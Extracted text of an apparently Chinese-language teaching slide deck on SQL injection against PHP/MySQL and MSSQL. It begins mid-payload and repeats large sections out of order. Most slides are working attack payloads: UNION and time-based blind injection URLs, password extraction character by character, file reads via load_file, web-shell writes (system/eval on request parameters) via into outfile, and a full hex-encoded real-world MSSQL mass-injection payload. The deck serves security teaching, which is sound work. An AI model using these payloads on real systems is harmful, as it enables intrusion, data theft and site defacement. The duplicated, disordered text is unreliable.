4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection ndash 簡介
bull Rfp ldquoNT Web Technology Vulnerabilitiesrdquo Phrack 1998
bull 維京百科
ndash SQL攻擊(SQL injection中國大陸稱作SQL注入攻擊)簡稱隱碼
攻擊是發生於應用程式之資料庫層的安全漏洞簡而言之是在輸入
的字串之中夾帶SQL指令在設計不良的程式當中忽略了檢查那麼這
些夾帶進去的指令就會被資料庫伺服器誤認為是正常的SQL指令而執行
因此遭到破壞
SQL Injection - 範例資料庫的資料
SQL Injection - 請試想這段程式碼有什麼問題
SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=
bull httpwwwhackdemocomgetUserphpid=9999999
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=2
SQL Injection攻擊技巧 ndash 空格與註解
bull 關鍵字大小寫混雜
bull 註解
(23) --
bull 空格
+
URL編碼 用途
09 horizontal tab
0a line feed
0b vertical tab
0c form feed
0d carriage return
20 space
SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(strlen) 返回某字串開頭開始的len最左字串
RIGHT(strlen) 返回某字串開頭開始的len最右字串
SUBSTRING(strposlen) 取得某字串的子字串
SUBSTR(strposlen) 為SUBSTRING同義詞
MID(strposlen) 為SUBSTRING同義詞
CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
CONCAT(str1str2) 返回值為所有連接參數產生的字串
NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數
hellip
SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE varwwwhtmlbackphp 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同
DATADIR 讀取資料庫路徑
BASEDIR 資料庫安裝路徑
hellip
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection - 範例資料庫的資料
SQL Injection - 請試想這段程式碼有什麼問題
SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=
bull httpwwwhackdemocomgetUserphpid=9999999
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=2
SQL Injection攻擊技巧 ndash 空格與註解
bull 關鍵字大小寫混雜
bull 註解
(23) --
bull 空格
+
URL編碼 用途
09 horizontal tab
0a line feed
0b vertical tab
0c form feed
0d carriage return
20 space
SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(strlen) 返回某字串開頭開始的len最左字串
RIGHT(strlen) 返回某字串開頭開始的len最右字串
SUBSTRING(strposlen) 取得某字串的子字串
SUBSTR(strposlen) 為SUBSTRING同義詞
MID(strposlen) 為SUBSTRING同義詞
CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
CONCAT(str1str2) 返回值為所有連接參數產生的字串
NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數
hellip
SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE varwwwhtmlbackphp 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同
DATADIR 讀取資料庫路徑
BASEDIR 資料庫安裝路徑
hellip
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
